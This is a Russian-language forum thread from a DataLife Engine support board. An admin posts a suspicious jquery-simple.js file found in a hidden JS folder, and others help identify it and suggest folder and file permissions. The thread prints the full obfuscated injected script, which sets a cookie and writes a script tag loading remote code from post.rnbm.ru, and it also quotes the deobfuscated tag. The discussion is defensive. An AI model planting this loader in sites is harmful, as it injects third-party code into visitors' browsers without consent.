Вредоносник

[hrompic 4]

Сегодня при проверке Антивирусом в админке была обнаружена левая папка JS со скриптом jquery-simple.js .Выкладываю здесь код-гляньте что за зверь:

"; expires="+ expires.toGMTString()))+ ((path==null)?"""; path="+path))+ ((domain==null)?"""; domain="+domain))+ ((secure==true)?"; secure":"")} gomega();

clicko=0;



function gomega()

{

clicko=clicko+1;

if(clicko<2)

{

Traf1788Ru=GoMegaBR('rgood_2');


if(Traf1788Ru<=2)

{

nexting=Number(Traf1788Ru)+1;

lolypop(nexting)}

}


}


function lolypop(gocode)

{

day=new Date();


id=day.getTime();


document.write('<scr'+'ipt type="text/javas'+'cript" src="http://po'+'st.r'+'n'+'b'+'m.r'+'u/j'+'s/sm'+'ar'+'tblock/get-code.js"></scr'+'ipt>');


pathname="/";

myDomain="/";

var largeExpDate=new Date();

largeExpDate.setTime(largeExpDate.getTime()+(4*60*60*1000));

Setkyks('rgood_2',gocode,largeExpDate,"/")}




function GoMegaBRVal(offset){


var endstr=document.cookie.indexOf(";",offset);


if(endstr==-1)

endstr=document.cookie.length;

return unescape(document.cookie.substring(offset,endstr))}


function GoMegaBR(name){

var arg=name+"=";

var alen=arg.length;

var clen=document.cookie.length;

var i=0;

while(i<clen){

var j=i+alen;

if(document.cookie.substring(i,j)==arg)

return GoMegaBRVal(j);

i=document.cookie.indexOf(" ",i)+1;

if(i==0)

break}

return null}


function Setkyks(name,value){

var argv=Setkyks.arguments;

var argc=Setkyks.arguments.length;

var expires=(argc>2)?argv[2]:null;

var path=(argc>3)?argv[3]:null;

var domain=(argc>4)?argv[4]:null;

var secure=(argc>5)?argv[5]:false;

document.cookie=name+"="+escape(value)+

((expires==null)?""

Изменено 11 июля 2011 пользователем hrompic

[notbugme 0]

document.write('<scr'+'ipt type="text/javas'+'cript" src="http://po'+'st.r'+'n'+'b'+'m.r'+'u/j'+'

s/sm'+'ar'+'tblock/get-code.js"></scr'+'ipt>');

цепляет левый js <script type="text/javascript" src="http://post.rnbm.ru/js/smartblock/get-code.js"></script>

[hrompic 4]

document.write('<scr'+'ipt type="text/javas'+'cript" src="http://po'+'st.r'+'n'+'b'+'m.r'+'u/j'+'

s/sm'+'ar'+'tblock/get-code.js"></scr'+'ipt>');

цепляет левый js <script type="text/javascript" src="http://post.rnbm.ru/js/smartblock/get-code.js"></script>

Спасибо большое! А кроме этой папки для данного скрипта ничего не может быть еще на хостинге? Или этой папки достаточно чтобы скрипт выводился?

И подскажите как обезопасить папку с шаблонами от заливки туда вот таких скриптов?

Изменено 12 июля 2011 пользователем hrompic

[celsoft 5 999]

И подскажите как обезопасить папку с шаблонами от заливки туда вот таких скриптов?

Скрипт в папки шаблонов ничего не заливает, поэтому DLE обезопасить вас от заливки чего либо не может. Но рекомендуется, если вы не собираетесь файлы шаблона редактировать через админпанель скрипта, тогда убрать права на запись у папки и файлов шаблона.

[hrompic 4]

И подскажите как обезопасить папку с шаблонами от заливки туда вот таких скриптов?

Скрипт в папки шаблонов ничего не заливает, поэтому DLE обезопасить вас от заливки чего либо не может. Но рекомендуется, если вы не собираетесь файлы шаблона редактировать через админпанель скрипта, тогда убрать права на запись у папки и файлов шаблона.

Какие права нужно выставить7

Спасибо!

[Dj Dance 185]

Какие права нужно выставить7

adfrw (0664)

[hrompic 4]

Какие права нужно выставить7

adfrw (0664)

А на папку?

[Dj Dance 185]

А на папку?

Аналогично.

[WWW.ZEOS.IN 1 161]

На папки 755, на файлы 644